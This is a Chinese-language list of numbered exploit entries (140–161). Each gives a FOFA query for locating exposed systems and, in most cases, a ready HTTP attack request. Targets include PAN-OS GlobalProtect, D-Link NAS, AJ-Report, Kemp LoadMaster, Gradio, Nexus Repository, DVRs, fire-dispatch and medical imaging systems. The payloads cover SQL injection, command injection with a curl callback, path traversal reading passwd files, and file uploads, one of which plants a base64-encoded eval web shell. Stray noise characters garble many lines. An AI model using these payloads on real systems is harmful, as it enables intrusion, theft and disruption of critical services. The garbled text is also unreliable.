! n/ I& n) @& r' O7 J/ r* e5 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# R, w. d8 F/ ~- x: |$ A CAccept-Encoding: gzip, deflate, br
1 A/ R: @9 I4 l: z' TConnection: close2 |% @) u' H! h: ~' p
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
2 s& I; e; p7 K0 a& N# TUpgrade-Insecure-Requests: 1
8 m% i) A ~# ]6 `5 a' P! Q7 j! r4 n0 {1 N" I N; D6 t& \
8 j2 u. [$ z; |8 f/ `8 `! ]
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) k \5 T0 A1 o# xCVE-2024-2566
; {5 a8 C. E! B# ?- b) }* bFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 Y# o7 M8 K4 r8 \GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
6 B3 l/ ~, S* Q* f: gHost: x.x.x.x
3 M2 H" ^6 ?" ^. x* p7 N' g7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 i! b/ `7 U. ~6 k9 _! s l) q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 ?3 M( g3 }6 N# G5 D! W' O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' K& Q7 i5 n3 _4 x0 \" E6 \- ^, R
Accept-Encoding: gzip, deflate, br6 H% d5 m3 @2 L) t0 {. @5 b3 B
Connection: close
3 q$ t8 B1 p% |Cookie: authcode=h8g9
& Q* k M" E5 _) \6 d Y' ^Upgrade-Insecure-Requests: 1
) B/ U. i9 g# B. t3 c8 ^) _/ Z, M S& L) {* j
, t( Z; y9 U6 r" h: d; `, f141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入& Z9 D+ s5 d% M; r% p; i2 \9 u
FOFA:body="指挥调度管理平台", |" J. l& I& H
POST /app/ext/ajax_users.php HTTP/1.1
# l/ Q1 D0 p. b( u- _9 a, e' ?! tHost: your-ip9 y* r& m( \1 d: Y- S$ R0 f
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info& V, R' q3 }) D+ R. i5 {
Content-Type: application/x-www-form-urlencoded5 X0 D+ `0 g! x& }* a% W* |
, v$ t1 `/ n: ^% `3 i( l! o
1 t( ^3 c8 p$ a# U' X
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
/ r$ Q# X& R- \0 T) O! F9 @% R
- F2 L/ [0 ~- L5 R
142. CMSV6车辆监控平台系统中存在弱密码
/ A3 D: D; s# Q: ?! s1 k6 K% @; bCVE-2024-29666+ A7 Z+ E' e0 u* D N( {% z
FOFA:body="/808gps/"
, |: O+ q+ r) _% k$ padmin/admin3 ~( q2 w$ Z( b0 A/ V0 W
143. Netis WF2780 v2.1.40144 远程命令执行( j; t1 {% G9 b6 |% F
CVE-2024-25850
. u6 @$ g4 d# r. v5 ]0 W1 j* FFOFA:title='AP setup' && header='netis'
9 g( g# s% I( B3 E2 [7 kPAYLOAD n6 D# w; D0 e9 d# g& R: X( B |6 l
7 E; [3 F& D5 C& j0 I. z144. D-Link nas_sharing.cgi 命令注入2 Q: N6 P3 i: h6 ? m. x8 D8 a$ t8 H
FOFA:app="D_Link-DNS-ShareCenter"
0 B. a2 D( a4 Jsystem参数用于传要执行的命令9 o* ?. b% W/ w ]% ^; g
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1 f) E7 `5 m3 P" W/ w
Host: x.x.x.x1 X t( E5 E+ _5 Y/ `% T* E* n$ K
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
* z+ {% z8 D- J) x6 Z- oConnection: close
# M, H$ h) A T' E9 M, n( N# IAccept: */*
) {" b9 [* m" s IAccept-Language: en
, o, \/ f W- xAccept-Encoding: gzip
- k( w- w! G, U" f5 i, F2 W' ]: Z+ s0 Z, R* v7 w! B) _. h7 [8 _
0 Z& \; L3 j$ K, T9 x145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; b3 J/ ^9 E$ p8 ]% H! V
CVE-2024-3400: | w: D$ [& G7 |7 C
FOFA:icon_hash="-631559155") ]6 L4 J( n8 {5 b& z
GET /global-protect/login.esp HTTP/1.1
2 z/ |5 n5 t5 G, s) B6 RHost: 192.168.30.112:1005/ ^$ S8 g8 O8 |0 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
! u, b7 a( O( n: W; A- l; uConnection: close# m n( U, K" U- o9 j. D
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;4 z0 i) z5 j( l0 s9 Q0 M. c" b; J# |$ u
Accept-Encoding: gzip. S: y% T2 M! P! w
) E b, I. N9 I4 b& u* C
0 E. i3 t4 |0 T* p146. MajorDoMo thumb.php 未授权远程代码执行# h: x8 y( `, b
CNVD-2024-02175- V& ~+ I! w$ B y z
FOFA:app="MajordomoSL", m( Q8 W/ G" @5 @
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
1 x4 B& r; P1 k: O! YHost: x.x.x.x( k& |( h# E7 m7 t" _3 n7 ^ ~& V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.847 [( E4 d# W6 U ?% R7 v
Accept-Charset: utf-8
) l0 N$ Z. Y# y# f( D b8 c; H+ }4 FAccept-Encoding: gzip, deflate
3 C; E% V4 \9 B7 w/ W W. e$ BConnection: close
) Z. c# t! L( I+ U! E8 y6 ]& L" E' p/ a
+ n, K& H3 p% ]4 `2 p5 e
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历# T5 C: |0 f9 n9 f0 \
CVE-2024-32399
" U1 W+ c f& _+ E7 xFOFA:body="RaidenMAILD"
* c: ]7 t3 i% g6 |" A4 pGET /webeditor/../../../windows/win.ini HTTP/1.1
0 D" }' Y5 r2 \. ]8 h, B- Y1 lHost: 127.0.0.1:81
+ }+ _$ y J8 ?Cache-Control: max-age=0
1 \1 x: l5 M+ g; eConnection: close
' G* L! Z9 O d! `) F7 O: W+ l! ]* V/ }
1 T u8 b4 T; V. o( \: M/ O
148. CrushFTP 认证绕过模板注入- y$ W+ Z3 A) `" U b! f2 {! b5 b
CVE-2024-4040' T) q- |7 E; F* A/ L2 C7 U
FOFA:body="CrushFTP"
l. h: N" @: T0 x& h0 {PAYLOAD4 ~6 ?! @; H: f
* K# \) x! d! Q: K' ^5 H149. AJ-Report开源数据大屏存在远程命令执行& v6 V! T- q9 D, x' y
FOFA:title="AJ-Report" a0 E" d* w2 ^- a
3 h& y0 o I+ h6 P. mPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1. N8 O' k6 a; ]. S
Host: x.x.x.x
8 M+ f+ `4 ?6 i5 I' @' N+ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ r H4 H$ Z9 }2 K% {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' X/ z c2 s& _2 pAccept-Encoding: gzip, deflate, br4 c( q5 q% D1 {2 G' i2 D
Accept-Language: zh-CN,zh;q=0.91 @' x' W% k% K5 L+ ? i; h
Content-Type: application/json;charset=UTF-8
: R+ E& H( b( l) y. d. v8 F1 fConnection: close+ S: O2 Y7 w# R2 A: j, @7 X3 p/ z
4 k! O) U7 N& E0 v
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}5 ^ o+ L2 B9 V
* H/ a* s. E1 J5 [1 x* {% |150. AJ-Report 1.4.0 认证绕过与远程代码执行. l" i) u% Q$ S! k/ V& d
FOFA:title="AJ-Report"
% B1 G5 G5 B( T# p, X0 c9 aPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1; t2 g6 ~# o6 W# t! I- `0 F) O
Host: x.x.x.x
( Q, L$ s! V, t1 N8 E; ?0 c( _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# T: L5 ~5 W" W+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ o$ L7 h+ \/ n0 f4 V. W$ S: j3 ^* eAccept-Encoding: gzip, deflate, br
; Q: e# A& j* y6 S6 f, XAccept-Language: zh-CN,zh;q=0.92 x- ]/ d* @5 V2 J0 ~/ M
Content-Type: application/json;charset=UTF-8
, P/ }/ m( m* s6 D9 z! @Connection: close
. g1 ~0 |! ^7 s lContent-Length: 3398 g/ T @8 {, _) {( i
9 ?5 M- V1 w2 @2 z# `% i{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; e/ p7 \$ k4 p* O) [+ D0 C
& |- x6 ~' Y' w! E
$ q( O3 M2 `& J4 I' B+ y& X. ]' Q
151. AJ-Report 1.4.1 pageList sql注入- V, i8 h7 y0 @" M$ K/ T0 t& a3 M
FOFA:title="AJ-Report", |5 [ Q! S+ x; n3 X
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
: H) W# l; P2 rHost: x.x.x.x
* H+ C2 y. z8 C. v: IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 P2 a4 B8 j. x4 aConnection: close
4 X* [2 h3 R& ^. uAccept-Encoding: gzip
0 v/ h& Q; B9 y }" p4 w( q
- k6 }; {% p7 M0 P. S$ `2 W' P9 c
. h. B' F( q* H a# H, R" a152. Progress Kemp LoadMaster 远程命令执行( h% k: ~ }+ d' \1 M. |8 Z# B! {' x
CVE-2024-1212
2 K% S% T5 g' o y# w" tLoadMaster <= 7.2.59.2 (GA)
5 L8 s" D" I V7 A" m1 gLoadMaster<=7.2.54.8 (LTSF): j# } J# G" I, {3 m9 D
LoadMaster <= 7.2.48.10 (LTS)1 N9 _0 Q9 K. J& K
FOFA:body="LoadMaster"* Z% g; u2 r! T' P+ K5 b3 N& Q
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
0 A8 T9 R, Q# s# m; V; ~+ g+ OGET /access/set?param=enableapi&value=1 HTTP/1.1
1 u4 e3 z) n! ] p: Y% EHost: x.x.x.x
. x' O, |) v8 M( R3 L! hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
2 n6 ]) ]( n0 N' _7 q8 t1 ]Connection: close& D7 t6 r& U) z- c5 J& I
Accept: */*
; f R/ E& F! W2 m( [Accept-Language: en
2 Q- c" z. T j( s4 V$ WAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
6 C7 j8 x0 B4 \1 x* r* }* y' R) DAccept-Encoding: gzip
9 {" |, t. G. |3 S8 K' G: z0 L3 Z- s' w$ S5 Z Y! x% w A
0 m) [+ ]8 [, X% u4 j5 S
153. gradio任意文件读取' l3 n4 S4 j7 R" j" U! x7 i3 A
CVE-2024-1561FOFA:body="__gradio_mode__"
$ k# w, `' |$ o, o! p: Z5 B6 f第一步,请求/config文件获取componets的id
. n" I6 C) Z% G! uhttp://x.x.x.x/config' b I' }( O" J. ?
) U) N4 ^ X2 H- e% V
7 V1 C5 @8 K& m& _
第二步,将/etc/passwd的内容写入到一个临时文件. ^* c/ y" Z* R9 Y( J
POST /component_server HTTP/1.1+ I! g F# O/ c# ~- [/ I1 ]+ P
Host: x.x.x.x5 M$ I, t S* A9 w8 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
4 _% `) B$ k4 r) Y. X2 bConnection: close
9 u" J1 G! E6 \; K- pContent-Length: 115
1 S. B* ~ _3 E* q9 _6 p) pContent-Type: application/json
5 n% Y: r. Q( x7 l" h2 q6 ~Accept-Encoding: gzip9 m& g7 d9 g$ ^* Z* f$ ]& {
8 S- |7 E& y. w
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
/ Q" m* ?1 e& e9 _- Q3 f) C
, D! }6 T3 x- \8 E, Y& ~) ~, w( c1 p+ y# j9 p& U% y# z/ g
第三步访问0 k4 ?* p% n% J: }' N9 u
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
0 C. F5 g/ A% G9 d- y7 T
0 y- x0 f2 _( E k% o; ^. \3 o- w: R2 y9 {8 w6 F
154. 天维尔消防救援作战调度平台 SQL注入' l |% P0 {5 d5 ]
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入") ]& \3 c/ H6 {; j* r- A
POST /twms-service-mfs/mfsNotice/page HTTP/1.19 E. r( T/ I& }
Host: x.x.x.x
( b: f. h3 k5 W8 xContent-Length: 106
/ J" l; \, i$ E- p. b9 ~Cache-Control: max-age=0
! R9 k+ h0 o/ B+ ?Upgrade-Insecure-Requests: 1
8 d. u' G. U H: ~3 D+ H0 H& oOrigin: http://x.x.x.x: q) j- Z! {0 y
Content-Type: application/json
3 H1 t U% _5 h; T# |7 y" J7 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) R3 x l4 \% v# @0 K4 G" g; y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ b s/ _2 d! g I; GReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page6 {* Y* F2 K$ ~" w
Accept-Encoding: gzip, deflate
1 e0 ]% h# y( \( E, e' v O5 n" TAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.73 N7 P, D$ v2 R1 \7 P$ K
Connection: close
* H+ u. o7 a, U H2 z
$ U& I9 |# F v' N{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
! [! s, o0 \4 D* d
+ N/ K( v9 N( G) x2 {9 Z) S
7 N+ H' g: m4 e) K* a: e* z155. 六零导航页 file.php 任意文件上传
( }/ t; b2 r7 F+ ^CVE-2024-34982
, g" h/ c9 j4 q4 A+ N- r7 u0 }! IFOFA:title=="上网导航 - LyLme Spage"
& j8 n$ Q- |7 XPOST /include/file.php HTTP/1.1
+ \3 u) X& ?" BHost: x.x.x.x
3 a- A/ S( P1 R! e+ O* G8 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& N' a/ F3 u% Q8 e" x* h5 cConnection: close: Q$ D7 f' Y' S+ K; S2 b
Content-Length: 232
7 z$ Z4 m# d9 C' M: GAccept: application/json, text/javascript, */*; q=0.01. ~ |6 U7 R! w3 j! C
Accept-Encoding: gzip, deflate, br6 @1 A, E# n6 x: s: U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' c1 W- `& {0 V# ~Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f9 j0 e& h% S& E) J. n8 T0 A$ T) K
X-Requested-With: XMLHttpRequest
7 Y1 x2 R0 C& I/ r+ c
5 }; |( K. q3 u0 W* g-----------------------------qttl7vemrsold314zg0f
- g! M( G6 a! h7 hContent-Disposition: form-data; name="file"; filename="test.php"" K O) o, ~ f7 ^; j* b, H
Content-Type: image/png8 U% `- t4 y4 `3 [3 I' a
9 s0 m$ j0 p, o5 @7 q+ q+ N) k<?php phpinfo();unlink(__FILE__);?>
r& d8 N* A. ` i$ {* l-----------------------------qttl7vemrsold314zg0f--! p$ Z3 s" r6 t
$ b: k1 A: Z9 F3 [5 b. t) Y1 |7 j
2 _9 E" N5 E+ x; E0 p访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php/ [0 }: n1 j% f. Z% L
/ z. a @+ q# b- ?) X3 f8 q156. TBK DVR-4104/DVR-4216 操作系统命令注入/ r4 Y. P$ V4 H* @+ z3 q
CVE-2024-3721+ R H1 v) [8 p; j
FOFA:"Location: /login.rsp"
1 k* L4 D8 I- ^4 {& w9 g·TBK DVR-41042 n R% J* _ V4 q/ Q5 Y# c
·TBK DVR-4216
5 P$ X8 b) }9 ?* N% {curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
1 i, |8 {# s& K6 s/ R% ? X+ q+ A. ^
; n- q- e% U4 ~' U# u: ^7 KPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
; ?3 `, c' [4 u* kHost: x.x.x.x% i V# c( j9 W
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 F/ X d: ?* m* F5 f7 R
Connection: close
* W/ T. I/ V XContent-Length: 0
$ S& i2 r- y/ G; S9 qCookie: uid=1
, j) n; L) ~3 j" T; a6 Z4 AAccept-Encoding: gzip+ V: I2 T& e" X3 E2 B( x* m/ W r
4 ~) l( v% N9 r( a. A ]1 V9 `$ ]7 N$ e: _
157. 美特CRM upload.jsp 任意文件上传
/ \% I: Q: G- X5 c; SCNVD-2023-06971 p% y* A5 V9 S. I8 J1 E3 z
FOFA:body="/common/scripts/basic.js"9 | o: a& {2 H* K' B7 t, D: A" E
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
( d7 ?$ _3 U' t4 m: @7 G' rHost: x.x.x.x
# H) r& ^' Q1 E B/ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
3 S6 r$ W* Z1 l( b, ]* x/ G8 uContent-Length: 709; ^/ k; L8 g4 M4 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& v8 E D% _& G. oAccept-Encoding: gzip, deflate" Y5 z& s8 P% @: s2 l' z% e
Accept-Language: zh-CN,zh;q=0.9
z9 G8 e1 J4 ^2 d% J! M8 M0 ACache-Control: max-age=0
& d, A: l, T: d4 ]; D/ K* ~Connection: close, h0 w, `* x1 C% ^/ z9 x5 a6 c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
0 i6 R* D% Y# }Upgrade-Insecure-Requests: 12 C Y' j' l0 u; B0 s
: ]4 T9 \9 [/ `: Q$ T# F
------WebKitFormBoundary1imovELzPsfzp5dN
2 l( s; D, a( L% H$ V0 i/ MContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"* s5 n H% o" @- v6 K3 F# S3 ^+ J
Content-Type: application/octet-stream$ B& j5 h* x8 M0 T" `$ Q# s q/ W
6 z5 g' }) w8 k9 x$ r
nyhelxrutzwhrsvsrafb$ W7 f4 y1 z. v) q* i( i# H9 } Z# r
------WebKitFormBoundary1imovELzPsfzp5dN
+ u; g# G/ k" T8 yContent-Disposition: form-data; name="key"6 z" s6 ~* u+ y+ J1 U( f2 C Y
7 c) S, u9 {# C o8 _; D% r
null
7 a# j- J2 j- f% M8 Q4 u------WebKitFormBoundary1imovELzPsfzp5dN0 H9 [% u2 E4 o7 V% v, s7 s- |2 H- z! I
Content-Disposition: form-data; name="form"
/ Z) u; t) D2 w+ f! q
( W! r. l* e0 }) S1 Fnull3 W8 V. Y; {5 s+ U$ Q
------WebKitFormBoundary1imovELzPsfzp5dN, W% J% _" {5 j6 G& W
Content-Disposition: form-data; name="field", `: t$ _* s& B. f
! ?, e6 Y3 I5 D4 `6 \5 O
null8 H% ~1 A v6 I, R7 a
------WebKitFormBoundary1imovELzPsfzp5dN
; ]$ f9 R9 V a& ^, lContent-Disposition: form-data; name="filetitile"
, J( v; Y# \! @9 X8 I- E5 a" I
# }" D: [0 B) x7 p \) L d3 Nnull
+ K7 x' Y1 ]5 j1 A4 p------WebKitFormBoundary1imovELzPsfzp5dN) O3 R: K' P" d1 _; Q
Content-Disposition: form-data; name="filefolder"
9 D! {; C" j" c8 e2 f. m5 R' x7 {0 J, T: e, R" z+ r0 b1 y- \ r
null) d, g6 l& p8 U9 C
------WebKitFormBoundary1imovELzPsfzp5dN--: Q* ~& R ?8 M5 x5 [
4 \# q1 A# j/ D
- J8 L6 x0 a: b7 c: u' _
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
1 z y, V, A A9 t$ X0 ]" ^, r) g# {2 F. x& C2 H( L2 ~
158. Mura-CMS-processAsyncObject存在SQL注入. }$ T1 T# x( r9 U2 G
CVE-2024-32640
5 P% ]" i' D3 i& N* {$ d8 lFOFA:"Generator: Masa CMS"; t+ `( o+ W6 q9 W6 {$ K
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 {' D& M; o# j- y2 v" JHost: {{Hostname}}! q+ d' h2 X. ]6 ^. u2 R7 T3 G
Content-Type: application/x-www-form-urlencoded( i. c, q8 H2 u+ A& ^
) B& c9 E% J! }6 g7 k% ^. tobject=displayregion&contenthistid=x\'&previewid=15 e! N5 U5 L- I5 Z+ [9 A, i; f+ [
* d1 O. M" q7 c" ?! K- k
- @$ u' L4 R) h+ ^3 i159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传. V& L% S. E! ?+ x& R
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
- |+ w- t! {% q3 ]5 vPOST /webservices/WebJobUpload.asmx HTTP/1.1
! J' C, |: `2 W2 N5 I) R. ?! J; s! }Host: x.x.x.x
; n: ]" o8 C+ i& tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
8 i$ k7 l0 _: _Content-Length: 1080
+ |' i9 c) _8 D8 s1 Z* zAccept-Encoding: gzip, deflate
9 y }. M! ~2 o8 m( JConnection: close4 u* U9 {9 q. \- t
Content-Type: text/xml; charset=utf-8
& j6 o8 d; z7 b+ `7 c/ rSoapaction: "http://rainier/jobUpload"1 Z" _' j- E/ \, u+ A" b9 c
1 W1 v% `1 c8 h- w<?xml version="1.0" encoding="utf-8"?>% |) A3 ?4 g( l( \& _& z. n
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 Y+ a4 z4 {1 o! Y; _
<soap:Body>
g/ {0 U8 I( m1 b! d$ S6 M<jobUpload xmlns="http://rainier">" v& H* e8 H' F# f
<vcode>1</vcode>
- {! E6 P) r8 |4 ^# R<subFolder></subFolder>, D- Y5 j$ x) ]8 Z5 M7 v N
<fileName>abcrce.asmx</fileName>
" [2 Y/ P, G# M& p3 g1 A5 S+ ?$ c<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
, N5 V/ i: N0 z* d. F) q0 [</jobUpload>' G9 h2 _, ~2 o6 F+ T; C
</soap:Body>1 R0 J, n6 Q/ Z
</soap:Envelope>1 Q2 l5 w$ `5 L+ b
% e" c* P/ U2 I
! P5 D7 }! y, y7 j' U' ]- h/ m9 H/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
: e6 ^0 c% g3 p# d) E5 W/ z
5 a. j: W8 Y3 j- ]5 V
# C, \4 ?8 ?# z }$ X160. Sonatype Nexus Repository 3目录遍历与文件读取; E7 d% b' J6 ~
CVE-2024-4956
9 O& X Q" b' S+ C& x* O8 pFOFA:title="Nexus Repository Manager": k0 z( J2 a7 C7 k( J. y% _
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
2 d8 n# v* Z( a- m% W: wHost: x.x.x.x' Y9 R% G! ?" L. j: B
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
3 M8 i8 v# C/ l. V3 h3 VConnection: close
# z* B- y% D! JAccept: */*
3 ]" U0 \. ^5 b/ y$ h+ ~Accept-Language: en: i5 t; e4 M( ]2 A$ n
Accept-Encoding: gzip/ K3 v/ L3 P" I' L0 ]+ _
. ~& b% S: H, Q' M" Z7 H
/ Q8 t7 f2 `. A2 E& l% ~9 ]+ F4 ]
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 s1 j b2 i1 Z8 P2 N! P
FOFA:body="/KT_Css/qd_defaul.css"
3 h/ A* n4 @! B第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
@" e( V) X+ o# N `* O% oPOST /Webservice.asmx HTTP/1.19 E$ M, u; _1 Y
Host: x.x.x.x- v8 |% L% E5 X5 E/ d: W" P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
# c# w5 g# h* Z5 F! i+ SConnection: close
5 h) ] Z/ v C7 b& s3 Q% z. M! aContent-Length: 445
- S; P; Y/ \1 J+ L: y- }4 t4 aContent-Type: text/xml
6 \# N% l- n0 a: j, \$ \Accept-Encoding: gzip
$ l. F) Y1 X9 v, i! {( b7 I" h! V' q3 Z" F" |
<?xml version="1.0" encoding="utf-8"?>8 }! P, ]% B* k
<soap:Envelope xmlns:xsi="
( ?$ j4 z+ @% q# Q' ]http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"+ Q) Y) y, @! E
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* y9 ]: {2 ~% S9 t: o% u" H; f<soap:Body>( i/ P! {# v7 `4 X, y! G: k @2 t. B
<UploadResume xmlns="http://tempuri.org/">
+ s& u6 G9 V' W, ?/ e<ip>1</ip>1 E. }! H5 r1 X' D7 {0 L
<fileName>../../../../dizxdell.aspx</fileName>
4 x# \' H, a$ ]+ q" Q<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>2 \2 O9 D% j/ W3 q9 e
<tag>3</tag>: j1 ]0 y/ J. O! ^
</UploadResume>" ~! A$ O) ]4 d! S/ y- A ~* y
</soap:Body>
